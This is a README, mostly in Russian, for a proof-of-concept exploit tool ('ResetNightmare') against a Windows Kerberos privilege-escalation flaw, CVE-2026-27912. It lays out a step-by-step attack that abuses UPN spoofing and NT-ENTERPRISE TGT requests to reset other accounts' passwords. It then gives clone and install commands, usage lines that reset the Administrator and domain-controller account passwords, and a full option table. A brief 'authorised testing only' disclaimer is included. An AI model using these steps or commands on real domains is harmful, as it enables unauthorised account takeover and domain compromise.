
PoC для CVE-2026-27912 - повышение привилегий в Windows Kerberos (ResetNightmare). Несанкционированный сброс пароля через уязвимость Kerberos. Только для исследований в области безопасности.
CVE-2026-27912 — уязвимость повышения привилегий Windows Kerberos
ResetNightmare — несанкционированный сброс пароля через ошибку протокола смены пароля Kerberos.
| Поле | Значение |
|---|---|
| CVE | CVE-2026-27912 |
| Название | Уязвимость повышения привилегий Windows Kerberos |
| CVSS | 8.0 HIGH (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) |
| CWE | CWE-285: Некорректная авторизация |
| Опубликовано | 14 апреля 2026 г. |
| Исправлено | апрель 2026 г. |
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success
Install-WindowsFeature RSAT-AD-PowerShell)# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912
# Install dependencies
pip install -r requirements.txt
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v
Только для авторизованного тестирования безопасности и образовательных исследований.
Несанкционированный доступ к компьютерным системам противозаконен. Автор не несёт ответственности за неправомерное использование данного программного обеспечения.
n0vax1337 / Исследователь безопасности
Лицензия MIT — см. LICENSE
Последнее обновление: 2026
| Флаг | Описание | По умолчанию |
|---|
-t / --target | Имя целевой учётной записи | обязательно |
-p / --new-password | Новый пароль для целевой учётной записи | обязательно |
-u / --upn-user | Учётная запись для установки поддельного UPN | обязательно |
-up / --upn-password | Пароль для UPN-учётной записи | обязательно |
-c / --computer | UPNUser — учётная запись компьютера | флаг |
-r / --rubeus-path | Путь к Rubeus.exe | Rubeus.exe |
-e / --encryption | Поддерживаемый тип шифрования | AES256 |
-path / --create-path | Путь OU для создания новой учётной записи | "" |
-d / --dc | Имя контроллера домена | автоопределение |
-v / --verbose | Подробный вывод | флаг |